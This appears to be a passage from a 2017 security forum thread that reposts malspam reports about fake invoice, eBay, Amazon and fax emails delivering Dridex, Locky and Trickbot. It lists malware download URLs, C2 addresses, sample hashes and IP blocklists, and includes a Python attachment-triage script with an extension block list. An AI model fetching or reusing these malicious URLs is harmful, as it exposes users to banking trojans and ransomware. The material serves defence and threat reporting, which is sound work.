91.234.35.170 /imageload.cgi (FOP Sedinkin Olexandr Valeriyovuch aka thehost.ua, Ukraine)
109.234.35.75 /imageload.cgi (McHost.ru / VDSINA, Russia)
McHost is such a well-known purveyor of toxic-crap* that I recommend you block -all- of their ranges (plus I guess the related VDSINA ones), or even block-the-entire Webzilla AS35415**. You can find a list of the network ranges here**. thehost .ua also has a lot of crap*** and I would lean towards blocking-whole-network-ranges****.
Recommended minimum blocklist:
91.234.35.0/24
109.234.35.0/24 "
1] https://www.virustotal.com/en/file/a5e916675efe12b08ffb84eae9a800c5d4dcffd019fc1af60936e626e1e480f9/analysis/1504604787/
Invoice INV-000614.vbs

2] https://www.virustotal.com/en/file/918bc7aad6fa3fbe296eeb08ffed9f75da9e7c50fe6bf6f3f905cf58eff6473e/analysis/1504604894/
MSG000-00090.vbs

3] https://malwr.com/analysis/ZDEzOWQ0ZmFkNGI0NDA2MDgzYzcyMzQxMDg3ZDY1OWU/
Hosts
193.227.248.241

4] https://malwr.com/analysis/MzhiNjQ0OTU3MWNlNGMxOWE5ZTg3YmVmNWZkZmQyZjI/
Hosts
109.234.35.75
91.234.35.170

5] https://www.hybrid-analysis.com/sample/918bc7aad6fa3fbe296eeb08ffed9f75da9e7c50fe6bf6f3f905cf58eff6473e?environmentId=100
DNS Requests
193.227.248.241

6] https://www.hybrid-analysis.com/sample/a5e916675efe12b08ffb84eae9a800c5d4dcffd019fc1af60936e626e1e480f9?environmentId=100
DNS Requests
5.2.88.79

* http://blog.dynamoo.com/search?q=mchost

** https://bgp.he.net/AS35415#_prefixes

*** http://blog.dynamoo.com/search?q=Valeriyovuch

**** https://bgp.he.net/AS56485#_prefixes
___

Fake 'Invoice' SPAM - delivers Dridex
- https://myonlinesecurity.co.uk/fake-oneposting-invoice-ready-to-view-malspam-delivers-dridex-banking-trojan/
5 Sep 2017 - "... an email with the subject of 'OnePosting Invoice Ready to View' pretending to come from SPECTUR LIMITED <members@ onenewpost .com>. This eventually delivers Dridex banking Trojan... set up by criminals to spread malware and imitate oneposting .com. onenewpost .com was registered on 4th September 2017 by a Chinese entity and is currently hosted on OVH...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/OnePosting-Invoice-Ready-to-View.png

The -link-in-the-body- of the email goes to a -compromised- or fraudulently set up OneDrive for business /SharePoint site...
https ://royalpay-my.sharepoint .com/personal/jamie_costello_royalpay_com_au/_layouts/15/guestaccess.aspx?docid=0b0e5809caadd404ab8e21e3a7322f232&authkey=AfQzKtINqI58J1P-xlw10eg
which downloads a zip containing a .js file...
N2398210.zip: Extracts to: IN2398210.js - Current Virus total detections 6/58*. Payload Security**
downloaded Dridex (VirusTotal 32/64***) (I can’t easily determine the actual download location of the Dridex payload. It does come from -another- compromised or fraudulent SharePoint site)... it appears that onenewpost .com is a domain set up by criminals to spread malware... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ac88536b9392c2e597616af8fe04ef5438745d72e19df691384850123625aa07/analysis/1504580504/

** https://www.hybrid-analysis.com/sample/ac88536b9392c2e597616af8fe04ef5438745d72e19df691384850123625aa07?environmentId=100

*** https://www.virustotal.com/en/file/8e93edd75b9d24122c9c1cb7af2c3c18936b4be8f9a223202683c24462ce98c3/analysis/
MTXCLU.DLL

onenewpost .com: 188.165.209.31: https://www.virustotal.com/en/ip-address/188.165.209.31/information/

royalpay-my.sharepoint .com: 13.107.6.151: https://www.virustotal.com/en/ip-address/13.107.6.151/information/

:fear::fear: :mad:

AplusWebMaster
2017-09-06, 15:27
FYI...

Fake 'eBay invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-ebay-invoice-delivers-locky-ransomware/
6 Sep 2017 - "... Locky downloader... an email with the subject of 'Your invoice for eBay purchases (83998749832384616#)' [random numbers] pretending to come from eBay <ebay@ ebay .us>. We are also seeing these pretending to come from all the other main English speaking eBay domains:
ebay@ ebay .com.au
ebay@ ebay .co.uk
ebay@ ebay .com ...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Your-invoice-for-eBay-purchases-83998749832384616.png

eBay_Invoice_3476.js - Current Virus total detections 7/59*. Payload Security** | Downloads:
http ://homecarpetshopping .com/bxxomjv.exe (VirusTotal 13/61***)... The link-in-the-email body goes to one of numerous compromised sites. In this case it went to
http ://littleulearning .com/invoive.html
where it downloads an eBay_Invoice_####.js file from
http ://letoftheckhosa .info/invoicing.php
All of the compromised sites in these emails will download or try to download from this address. That creates a randomly numbered eBay_Invoice_.js file. The first 5 or 6 attempts gave me a 0 byte empty file until a working one was delivered... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7f87ea2a27839c647a0155937b2289c6b757cd0475654931389ad1183ec99f8c/analysis/1504698237/
eBay_Invoice_3476.js

** https://www.hybrid-analysis.com/sample/7f87ea2a27839c647a0155937b2289c6b757cd0475654931389ad1183ec99f8c?environmentId=100

*** https://www.virustotal.com/en/file/17db7e6bb5b643fdc4bdb2c3ba7bc55784cf37932d818c30ad58316e5e998b5c/analysis/1504698766/
bxxomjv[1].exe

homecarpetshopping .com: 208.79.200.218: https://www.virustotal.com/en/ip-address/208.79.200.218/information/
> https://www.virustotal.com/en/url/7045b142ed10ef369725b813a5b116fd8a248c3b2a69014069d84bfba97cfb8b/analysis/

littleulearning .com: 66.36.166.87: https://www.virustotal.com/en/ip-address/66.36.166.87/information/
> https://www.virustotal.com/en/url/13414fad567ab32f0605caad24efcb7a2ff31c324e50c02d1a239f38b935ad0d/analysis/

letoftheckhosa .info: 47.88.55.29: https://www.virustotal.com/en/ip-address/47.88.55.29/information/
> https://www.virustotal.com/en/url/1e07c9915f5e8d740addd7f70d95fe3ce39c53879a47bea82eccdcb0469f742b/analysis/
___

Fake 'Virgin Media bill' SPAM - delivers Dridex
- https://myonlinesecurity.co.uk/fake-your-virgin-media-bill-is-ready-malspam-delivers-dridex-banking-trojan/
6 Sep 2017 - "... an email with the subject of 'Your Virgin Media bill is ready' pretending to come from Virgin Media <webteam@ virginmediaconnections .com> which delivers Dridex banking trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Virgin-media-Bill.png

Virgin Media bill.zip: Extracts to: Virgin Media bill.js - Current Virus total detections 2/59*
Payload Security** | Dridex Payload VirusTotal 14/65*** | Payload Security[4] ... the criminals sending these have registered a look-a-like domain virginmediaconnections .com on 5th September 2017 using eranet .com as registrar and hosted on OVH 176.31.244.44. They are sending these emails from a whole-range-of-IP-addresses that pass email authentication for the -fake- domain virginmediaconnections .com...
The link-in-the-email goes to a compromised or fraudulently set up OneDrive for business/ SharePoint site where a zip file containing a .js file is downloaded. That eventually contacts http ://cabinetcharpentier .fr/css/style.png (which is -not- a png but a renamed .exe file) to download the Dridex banking Trojan...
https ://kobaltsystemsptyltd-my.sharepoint .com/personal/karen_kobaltsystems_com_au/_layouts/15/guestaccess.aspx?docid=1a0c9ac9effc046b6840207579a616453&authkey=AVRvpElPwHq48OG2zdkLMk8 ...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/1ccea9fed4b29baa55a4b49ddda17c8a770cb75334feebe18e23de3408d4f452/analysis/1504695675/
Virgin Media bill.js

** https://www.hybrid-analysis.com/sample/1ccea9fed4b29baa55a4b49ddda17c8a770cb75334feebe18e23de3408d4f452?environmentId=100
DNS Requests
91.216.107.90

*** https://www.virustotal.com/en/file/bac0583eeb6e481a403e5091e45df4b492195366e50fcb12deeff638cbfad878/analysis/1504696253/
FFCa9j9ru.exe

4] https://www.hybrid-analysis.com/sample/bac0583eeb6e481a403e5091e45df4b492195366e50fcb12deeff638cbfad878?environmentId=100

176.31.244.44: https://www.virustotal.com/en/ip-address/176.31.244.44/information/

cabinetcharpentier .fr: 91.216.107.90: https://www.virustotal.com/en/ip-address/91.216.107.90/information/
> https://www.virustotal.com/en/url/01f56dcf9d4978c403e3e8a72c648457fac70a8e7549c4fb1d5e98816406d071/analysis/

kobaltsystemsptyltd-my.sharepoint .com: 13.107.6.151: https://www.virustotal.com/en/ip-address/13.107.6.151/information/

:fear::fear: :mad:

AplusWebMaster
2017-09-07, 14:59
FYI...

Fake 'FreeFax' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-freefax-from1707075536-delivers-locky-ransomware/
7 Sep 2017 - "... Locky downloader... an email with the subject of 'FreeFax From:1707075536' (random numbers) pretending to come from fax@ freefaxtoemail .net...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/FreeFax-From-1707075536.png

Fax_Message_7932180645.js - Current Virus total detections 12/59*. Payload Security** downloads from
http ://universodeljuguete .com/eusukll.exe (VirusTotal 15/65[3]) (Payload Security[4])...
This current series of downloaders has links-in-the-body of the email to numerous different -compromised- websites. This particular one went to
http ://coopstella .net/fax.html where there is an -iframe- that downloads the js file from
http ://leypart .su/fax.php where a randomly numbered Fax_Message_####.js file is created and downloaded...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/39dfdcdfc991828b3044492a42d6049b63d9caf96162412f7dbf92031f9d135d/analysis/1504782496/
Fax_Message_7932180645.js

** https://www.hybrid-analysis.com/sample/39dfdcdfc991828b3044492a42d6049b63d9caf96162412f7dbf92031f9d135d?environmentId=100
Contacted Hosts
94.127.190.141
62.109.12.221
47.88.55.29
98.124.251.75
98.124.252.66

3] https://www.virustotal.com/en/file/e9981527fade0266ec18c73bf3cb066738ed12c3c3530a30a2e56a790d180107/analysis/1504784148/
eusukll.exe

4] https://www.hybrid-analysis.com/sample/e9981527fade0266ec18c73bf3cb066738ed12c3c3530a30a2e56a790d180107?environmentId=100

universodeljuguete .com: 94.127.190.141: https://www.virustotal.com/en/ip-address/94.127.190.141/information/

coopstella .net: 185.58.7.72: https://www.virustotal.com/en/ip-address/185.58.7.72/information/

leypart .su: > https://check-host.net/check-dns?host=leypart.su - ??

:fear::fear: :mad:

AplusWebMaster
2017-09-12, 16:17
FYI...

Fake 'Amazon' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-your-amazon-co-uk-order-has-been-dispatched-tries-to-deliver-malware/
12 Sep 2017 - "... coming from the Necurs botnet is an email with the subject of 'Your Amazon.co.uk order 172-3041149-3373628 has been dispatched' (random numbers) pretending to come from Amazon .co.uk <auto-shipping@ amazon .co.uk>...
UPDATE: found download site and it is Trickbot again...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Your-Amazon.co_.uk-order-172-3041149-3373628-has-been-dispatched-email.png

The fake Amazon website looks like this. The Sign In button does go to a genuine Amazon .co.uk sign in page:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/paranda_uz_amazon_downloader-_site.png
Update: ... 'found a download location
http ://storiteller .com/3f3geuf.exe (VirusTotal 11/59*) (Payload Security**)... 'not certain if actually running the .js file will deliver the payload or whether the malware devs have messed up.
Further update: I am also being told about some versions downloading Locky via
http ://ruisi .fr/ddokslf.exe (VirusTotal 10/65[3]) (Payload Security[4])... 'really difficult to work out the payloads, when the .js files are created on the fly... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/3b704063e484540747c121899bde2b4e68776795084b4f70b9a360f7e7b2ba95/analysis/1505211474/
ORDER-467-3587106-1645978.js

** https://www.hybrid-analysis.com/sample/3b704063e484540747c121899bde2b4e68776795084b4f70b9a360f7e7b2ba95?environmentId=100
Contacted Hosts
82.80.201.25
47.88.55.29

3] https://www.virustotal.com/en/file/81314c3e33ec0bcb5e4850a1835aa3914ff1e7d9ee3f5e4ed5c29016b67e660a/analysis/1505213071/
3f3geuf.exe

4] https://www.hybrid-analysis.com/sample/81314c3e33ec0bcb5e4850a1835aa3914ff1e7d9ee3f5e4ed5c29016b67e660a?environmentId=100

storiteller .com: 82.80.201.25: https://www.virustotal.com/en/ip-address/82.80.201.25/information/
> https://www.virustotal.com/en/url/630e4fd681837b81b89207a0ee3bef122d0bf2c49d09c448cf08990b5dc3c80a/analysis/

ruisi .fr: 195.154.227.5: https://www.virustotal.com/en/ip-address/195.154.227.5/information/
> https://www.virustotal.com/en/url/e1dbc08f200ba47dd854186d1b4bab73cb12734d0b4ce2c20671f6e779fe26e9/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-09-14, 14:02
FYI...

Fake 'Invoice' SPAM - Necurs botnet delivers malware
- https://myonlinesecurity.co.uk/more-necurs-botnet-sent-fake-invoices-deliver-malware/
14 Sep 2017 - "... sent from the Necurs botnet is a typical generic spam email with the subject of 'Copy of Invoice 487391' (random numbers) pretending to come from Customer Service <service@ randomdomain .tld>. There is -no- attachment with these today, just a link-in-the-email body to a variety of -compromised- sites. The link will always go to <site name>/invoice .html which uses an -iframe- to download a random numbered invoice.js from
http ://wittinhohemmo .net/invoice.php (this site has been used in this malware campaign for at least 1 week now). The js file is different to the ones we have been seeing so far this week, they are much smaller (about 5kb) and using trivially obfuscated reverse strings to “hide” the download sites...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Copy-of-Invoice-487391.png

Sites I found are:
http ://multila .com/HJGFjhece3.exe
http ://vereouvir .pt/HJGFjhece3.exe
They use email addresses and subjects that will entice a user to read the email and follow the link.
Invoice-671398.js - Current Virus total detections 9/58*. Payload Security**
HJGFjhece3.exe (VirusTotal 10/63[3]) (Payload Security[4]). I cannot work out if this is Trickbot or Locky today so far. The behaviour so far seen doesn’t exactly match either malware. It might be damaged or not working properly or some sort of anti-sandbox /VM protection to it. My gut feeling is -Trickbot- based on similar behaviour over the last few days when run in a sandbox or VM... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ae8d73230c0c51ac61d5107bc08608c4a8ff9624dc1af809bc44118dff24b10c/analysis/1505376478/
Invoice-290134.js

** https://www.hybrid-analysis.com/sample/ae8d73230c0c51ac61d5107bc08608c4a8ff9624dc1af809bc44118dff24b10c?environmentId=100
Contacted Hosts
203.74.203.14
47.89.254.1
80.172.241.21

3] https://www.virustotal.com/en/file/183ee9cb06b2d7bbaa785dd140a2c3b9558db7adefd70c2a8b06e05bee8e1e76/analysis/1505377027/
2193.exe

4] https://www.hybrid-analysis.com/sample/183ee9cb06b2d7bbaa785dd140a2c3b9558db7adefd70c2a8b06e05bee8e1e76?environmentId=100

wittinhohemmo .net: 47.89.254.1: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
> https://www.virustotal.com/en/url/2453d6fc6d140bd7651af4d33eef2050f52b792e8d26c5c33bf8aedfb2a4a393/analysis/

multila .com: 203.74.203.14: https://www.virustotal.com/en/ip-address/203.74.203.14/information/
> https://www.virustotal.com/en/url/32213a5473dd719533bcc09c17a86fc7b0ecdfec172daf4056e92bd9d659fdbf/analysis/

vereouvir .pt: 80.172.241.21: https://www.virustotal.com/en/ip-address/80.172.241.21/information/
> https://www.virustotal.com/en/url/7a19008d3e0391ac0c3bc3ba7c3069d0fb7a024b44c1925fe4cd13f2cd2285de/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-09-18, 14:22
FYI...

CCleaner 5.33 compromised...
- https://www.helpnetsecurity.com/2017/09/18/hackers-backdoored-ccleaner/
Sep 18, 2017 - "... Piriform – the company that develops CCleaner and which has been recently acquired by AV maker Avast – has confirmed* that the 32-bit version of the v5.33.6162 of CCleaner and the v1.07.3191 of CCleaner Cloud were affected..."
Security Notification for CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 for 32-bit Windows users
* https://www.piriform.com/news/release-announcements/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users
Sep 18, 2017 - "We recently determined that older versions of our Piriform CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 had-been-compromised. We resolved this quickly and believe no harm was done to any of our users. This compromise only affected customers with the 32-bit version of the v5.33.6162 of CCleaner and the v1.07.3191 of CCleaner Cloud. No other Piriform or CCleaner products were affected. We encourage all users of the 32-bit version of CCleaner v5.33.6162 to download v5.34 here: download**. We apologize and are taking extra measures to ensure this does not happen again..."
** https://www.piriform.com/ccleaner/download/standard

- http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
Sep 18, 2017 - "... Talos recently observed a case where the download servers used by software vendor to distribute a legitimate software package were leveraged to deliver malware to unsuspecting victims. For a period of time, the legitimate signed version of CCleaner 5.33 being distributed by Avast also contained a multi-stage malware payload that rode-on-top of the installation of CCleaner... Given the potential damage that could be caused by a network of infected computers even a tiny fraction of this size we decided to move quickly. On September 13, 2017 Cisco Talos immediately notified Avast of our findings so that they could initiate appropriate response activities..."
Indicators of Compromise (IOCs):
... IP Addresses
216[.]126[.]225[.]148 "

216.126.225.148: https://www.virustotal.com/en/url/add324c56011c4297f0eb88a2bd77715c6abee55b3cb300b4654d30956a5d3a8/analysis/
___

Fake 'Revised invoice' SPAM - delivers malware
- https://myonlinesecurity.co.uk/re-revised-invoice-malspam-tries-to-delivers-malware-using-an-r24-extension/
18 Sep 2017 - "... an email with the subject of 'Re: Revised invoice' pretending to come from Sales <Sales@ machinery .com>... it comes with an .r24 extension which is completely unknown to Windows. Examining the file in a hex editor shows it has a PK header, which means it is a compressed (zip) file. Simply renaming the extension to .zip will allow the contents to be extracted and examined...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/re-revised-invoice.png

New Invoice.r24 (VirusTotal 9/62*): Extracts to: New Invoice.com - Current Virus total detections 15/65**
Payload Security***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f39befc0d91916c60b70f35f3fa08a2070a8f9257f32a9f147da57149adac96b/analysis/1505723811/
New Invoice.r24

** https://www.virustotal.com/en/file/9fe67d131e40b4685d61b3f7463f07b11e030c9f7af9f956f3d6cd740d00ecb3/analysis/1505723863/
New Invoice.com

*** https://www.hybrid-analysis.com/sample/9fe67d131e40b4685d61b3f7463f07b11e030c9f7af9f956f3d6cd740d00ecb3?environmentId=100
___

Fake 'Status of invoice' SPAM - leads to Locky
- http://blog.dynamoo.com/2017/09/malware-spam-status-of-invoice-with-7z.html
18 Sep 2017 - "This spam leads to Locky ransomware:
Subject: Status of invoice
From: "Rosella Setter" ordering@ [redacted]
Date: Mon, September 18, 2017 9:30 am
Hello,
Could you please let me know the status of the attached invoice? I
appreciate your help!
Best regards,
Rosella Setter
Tel: 206-575-8068 x 100
Fax: 206-575-8094
*NEW* Ordering@[redacted].com
* Kindly note we will be closed Monday in observance of Labor Day *

The name of the sender varies. Attached is a .7z archive file with a name similar to A2174744-06.7z which contains in turn a malicious .vbs script with a random number for a filename... Automated analysis of those two samples [1] [2] [3] [4] shows this is Locky ransomware. Those two scripts attempt to download a component from:
yildizmakina74 .com/87thiuh3gfDGS?
miliaraic .ru/p66/87thiuh3gfDGS?
lanzensberger .de/87thiuh3gfDGS?
web-ch-team .ch/87thiuh3gfDGS?
abelfaria .pt/87thiuh3gfDGS?
An executable is dropped with a detection rate of 19/64[5] which Hybrid Analysis[6] shows is phoning home to:
91.191.184.158 /imageload.cgi (Monte Telecom, Estonia)
195.123.218.226 /imageload.cgi (Layer 6, Bulgaria)
.7z files are popular with the bad guys pushing -Locky- at the moment. Blocking them at your mail perimeter may help.
Recommended blocklist:
195.123.218.226
91.191.184.158 "
1] https://www.hybrid-analysis.com/sample/24888615662135054bb9a28d50ae2c0f6711975ba5251f0862ecc8b95b2512de?environmentId=100
Contacted Hosts
85.95.237.29
195.123.218.226
91.191.184.158

2] https://www.hybrid-analysis.com/sample/0faf7bb76b212bafe2949ed9c0d04c87a5aea40deefb11d360fb6912be84fbd8?environmentId=100
Contacted Hosts
194.150.248.56
91.191.184.158
195.123.218.226

3] https://malwr.com/analysis/Y2IxOTMwMjY3OGUyNGVjYmI4ODNiNzZjNjJjMmViYzQ/
5121669985.vbs

4] https://malwr.com/analysis/MGY4YzRmOWE2YTIxNDY3ZWE4NjZjYWE5NGJjZDA1ZmM/
25860394240.vbs

5] https://www.virustotal.com/en/file/c674da5f1c063a0bec896d03492620ac94687e7687a1b91944d93c1d6527c8a7/analysis/
CJgBjTI.exe

6] https://www.hybrid-analysis.com/sample/c674da5f1c063a0bec896d03492620ac94687e7687a1b91944d93c1d6527c8a7?environmentId=100
Contacted Hosts
91.191.184.158
195.123.218.226
216.58.209.228

85.95.237.29: https://www.virustotal.com/en/ip-address/85.95.237.29/information/

195.123.218.226: https://www.virustotal.com/en/ip-address/195.123.218.226/information/

91.191.184.158: https://www.virustotal.com/en/ip-address/91.191.184.158/information/

:fear::fear: :mad:
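The PK-header trick in the .r24 post above and the Dynamoo suggestion to block .7z at the mail perimeter both come down to judging an attachment by what it is rather than what it is called. The script below is an added example (not code from the quoted blogs): it sniffs magic bytes, compares them with the declared extension, and recurses into zip content; the filenames are taken from the posts, the file contents are constructed stand-ins.

```python
"""Attachment triage: magic bytes versus declared extension.

Added example, not code from the quoted blog posts. Sample contents below
are constructed stand-ins; only the signatures in MAGIC are real.
"""
import io
import re
import zipfile
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Real file-format signatures: leading bytes -> format name.
MAGIC = {
    b"PK\x03\x04": "zip",            # the "PK header" seen in the .r24 file
    b"MZ": "exe",                    # DOS/PE executable
    b"7z\xbc\xaf\x27\x1c": "7z",
    b"Rar!\x1a\x07": "rar",
    b"%PDF": "pdf",
    b"\x89PNG\r\n\x1a\n": "png",
    b"{\\rtf": "rtf",
}
# Extensions these campaigns ride on; reject them at the mail perimeter.
BLOCK_EXTENSIONS = {"7z", "rar", "vbs", "js", "hta", "exe", "com", "scr"}
EXEC_EXTENSIONS = {"exe", "com", "scr", "dll"}   # honestly named executables
EXPECTED_FORMAT = {"zip": "zip", "7z": "7z", "rar": "rar", "pdf": "pdf",
                   "png": "png", "docx": "zip", "rtf": "rtf"}
KNOWN_EXTENSIONS = (BLOCK_EXTENSIONS | EXEC_EXTENSIONS
                    | set(EXPECTED_FORMAT) | {"txt", "htm", "html"})


@dataclass
class Verdict:
    filename: str
    declared: str            # extension as named, lower-cased ("" if none)
    sniffed: Optional[str]   # format from magic bytes, None if unrecognised
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def sniff(data: bytes) -> Optional[str]:
    """Format implied by the leading bytes, ignoring the file name."""
    for signature, fmt in MAGIC.items():
        if data.startswith(signature):
            return fmt
    return None


def declared_extension(filename: str) -> str:
    match = re.search(r"\.([A-Za-z0-9]+)$", filename)
    return match.group(1).lower() if match else ""


def triage(filename: str, data: bytes, depth: int = 0) -> List[Verdict]:
    """Judge one attachment and recurse into zip content (renamed or not)."""
    ext, fmt = declared_extension(filename), sniff(data)
    verdict = Verdict(filename, ext, fmt)
    if ext in BLOCK_EXTENSIONS:
        verdict.reasons.append(f"blocked extension .{ext}")
    if fmt == "exe" and ext not in EXEC_EXTENSIONS:
        # a "style.png" or "YTkjdJH7w1.txt" that is really a PE file
        verdict.reasons.append(f"executable content disguised as .{ext or '(none)'}")
    elif ext in EXPECTED_FORMAT and fmt != EXPECTED_FORMAT[ext]:
        verdict.reasons.append(f".{ext} declared but content sniffs as {fmt or 'unknown'}")
    elif ext not in KNOWN_EXTENSIONS and fmt is not None:
        # a ".r24" that extracts fine once renamed to .zip
        verdict.reasons.append(f"unknown extension .{ext} carries {fmt} content")
    verdicts = [verdict]
    if fmt == "zip" and depth < 2:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                for member in archive.namelist():
                    verdicts.extend(triage(member, archive.read(member), depth + 1))
        except zipfile.BadZipFile:
            verdict.reasons.append("zip signature but archive is unreadable")
    return verdicts


def build_samples() -> Dict[str, bytes]:
    """Constructed inputs named after attachments in the posts."""
    fake_exe = b"MZ" + b"\x90" * 62 + b"constructed stand-in, not a real program"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("New Invoice.com", fake_exe)
    return {
        "New Invoice.r24": buf.getvalue(),          # zip under an unknown name
        "style.png": fake_exe,                      # renamed executable
        "YTkjdJH7w1.txt": fake_exe,                 # "txt" that is an .exe
        "A2174744-06.7z": b"7z\xbc\xaf\x27\x1c" + b"\x00" * 16,
        "invoice.pdf": b"%PDF-1.4\n%constructed benign sample\n",
    }


def triage_all(samples: Dict[str, bytes]) -> Dict[str, Verdict]:
    return {v.filename: v for name, data in samples.items()
            for v in triage(name, data)}


if __name__ == "__main__":
    for v in triage_all(build_samples()).values():
        print("SUSPICIOUS" if v.suspicious else "ok        ", v.filename,
              f"declared={v.declared or '-'} sniffed={v.sniffed or 'unknown'}",
              "; ".join(v.reasons))
```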

AplusWebMaster
2017-09-19, 20:51
FYI...

Fake 'Order' SPAM - delivers Locky ykcol
- https://myonlinesecurity.co.uk/fake-herbalife-order-number-invoice-malspam-delivers-locky-ykcol/
19 Sep 2017 - "... Locky downloader... an email with the subject of 'HERBALIFE Order Number: 6N01000137' (random numbers) pretending to come from Herbalife <svc_apacnts_8169@ herbalife .com> (random numbers as well). Today’s version continues to use the 'ykcol' extension for encrypted files...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/HERBALIFE-Order-Number-6N01000137.png

6N01000137_1.7z: Extracts to: 6N01005710.vbs - Current Virus total detections 16/55*. Payload Security**
| downloads an encrypted txt file which is converted by the script to vtifOYBP.exe (VirusTotal 30/64***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/794dcfdcc1362140eee6fcda11ddf239ab048a965bba634bb787321db9672cfa/analysis/1480616575/
-6dt874p53077.js

** https://www.hybrid-analysis.com/sample/dd4268c405dc83d5c3d171d26ceb76021a1b0b8aa94f98b6f883e63ef19f0814?environmentId=100
DNS Requests
isiquest1 .com - 178.33.107.201 - OVH, SAS - France
Contacted Hosts
178.33.107.201: https://www.virustotal.com/en/ip-address/178.33.107.201/information/
> https://www.virustotal.com/en/url/64d7292d120e024848d760be4deac362d84c482d7af5aca97b9dbb6a92fa3c34/analysis/

*** https://www.virustotal.com/en/file/d1b8b8c6cce9175c844875a68b61e50107cd7b5d5c6ac2ec76dbb3b06ed727f8/analysis/
JGHldb03m

:fear::fear: :mad:

AplusWebMaster
2017-09-20, 13:10
FYI...

Fake 'invoice' SPAM - delivering Locky
- https://myonlinesecurity.co.uk/more-random-company-fake-invoices-delivering-locky-ransomware-again-today/
20 Sep 2017 - "... Locky downloaders... an email with the subject of 'Status of invoice A2178050-11' (random numbers) pretending to come from random names with a from address of ordering@ random companies. The subjects all start with 'Status of invoice A217' with 4 extra digits, then 2 digits...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Status-of-invoice-A2178050-11.png

A2178050-11.rar: Extracts to: 20080920_757068.vbs - Current Virus total detections*. Payload Security**.
Downloads
http ://mariamandrioli .com/RSkfsNR7? which is an executable file....
Frequently these are encrypted -txt- files that need converting to the .exe (VirusTotal 16/65[3])
Payload Security[4]). Other download sites for the malware binary include:
http ://ryterorrephat .info/af/RSkfsNR7
http ://hard-grooves .com/RSkfsNR7?
Other sites and a -different- locky binary - details have been posted by Racco42[5] on pastebin[6]...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/794dcfdcc1362140eee6fcda11ddf239ab048a965bba634bb787321db9672cfa/analysis/1480616575/
-6dt874p53077.js

** https://www.hybrid-analysis.com/sample/0fbb399652c30e51c3c338380dd3a87e944496d64f5d9da56525e30880051ff2?environmentId=100
Contacted Hosts
108.59.87.148

3] https://www.virustotal.com/en/file/614bfea6b81f56b59bd0f2222b65b57571796245a7886a8e31be8a3ccd0e5617/analysis/1505896879/
RSkfsNR7.exe

4] https://www.hybrid-analysis.com/sample/614bfea6b81f56b59bd0f2222b65b57571796245a7886a8e31be8a3ccd0e5617?environmentId=100

5] https://twitter.com/Racco42/status/910423167092629504

6] https://pastebin.com/F5K6BKQX

mariamandrioli .com: 108.59.87.148: https://www.virustotal.com/en/ip-address/108.59.87.148/information/
> https://www.virustotal.com/en/url/d81cd4f457f0d9243d020c1953b51cdf51d333d4e65d58aa2176b704f633fdcd/analysis/

ryterorrephat .info: 54.187.116.55: https://www.virustotal.com/en/ip-address/54.187.116.55/information/
> https://www.virustotal.com/en/url/a25aac71207de2546eb594eaf8b9b9bb812342a3112fc8f014eca1dc9c63b343/analysis/

hard-grooves .com: 54.187.116.55: https://www.virustotal.com/en/ip-address/54.187.116.55/information/

:fear::fear: :mad:

AplusWebMaster
2017-09-21, 13:07
FYI...

Fake 'Amazon Invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-amazon-marketplace-invoice-malspam-delivers-locky-ransomware/
21 Sep 2017 - "... Locky downloaders... an email with the subject of 'Invoice RE-2017-09-21-00102' (random last 6 digits) pretending to come from Amazon Marketplace <uJLHsSYOYmvOX@ marketplace.amazon .co.uk> (random characters before the @)...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Amazon-Marketplace-Spam-email-with-Locky-downloader.png

RE-2017-09-21-00102.7z: Extracts to: RE-2017-09-21-00273.vbs - Current Virus total detections 14/58*:
Payload Security** | Downloads
http ://accuflowfloors .com/IUGiwe8? which is a txt file that is -renamed- to nVtcNP.exe (VirusTotal 22/63***)
Other download sites inside this VBS file are:
fulcar .info/p66/IUGiwe8 and
afradem .com/IUGiwe8? - There will be dozens of others in other versions...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a0485d80d244dba619691fb4f39fc36ba3323616733e48b63d61af1cd0894906/analysis/1505983662/

